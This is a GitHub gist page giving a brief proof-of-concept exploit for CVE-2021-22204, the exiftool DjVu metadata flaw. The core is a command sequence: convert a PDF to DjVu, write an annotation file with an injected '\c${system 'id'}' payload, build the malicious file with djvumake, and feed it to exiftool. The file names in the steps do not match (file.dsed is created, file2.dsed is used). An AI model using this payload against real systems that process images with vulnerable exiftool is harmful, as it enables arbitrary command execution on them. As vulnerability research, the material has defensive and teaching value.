ihebski/exiftool.md

Last active February 27, 2024 15:01

Star 1 You must be signed in to star a gist
Fork 0 You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/ihebski/cfbec41067f259efdc07f1587b268ab2.js"></script>
Save ihebski/cfbec41067f259efdc07f1587b268ab2 to your computer and use it in GitHub Desktop.

Download ZIP

exiftool exploit POC - CVE-2021-22204

Raw

exiftool.md

exiftool exploit : CVE-2021-22204

Author

ihebski commented May 8, 2021 •

edited

Convert any PDF file to .djvu;

pdf2djvu document.pdf -o fuzz.djvu

create file.dsed

(metadata
        ("\c${system 'id'}")
.

Generate the exploit file

djvumake fuzz.djvu INFO=0,0 BGjp=/dev/null ANTa=file2.dsed

./exiftool fuzz.djvu

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment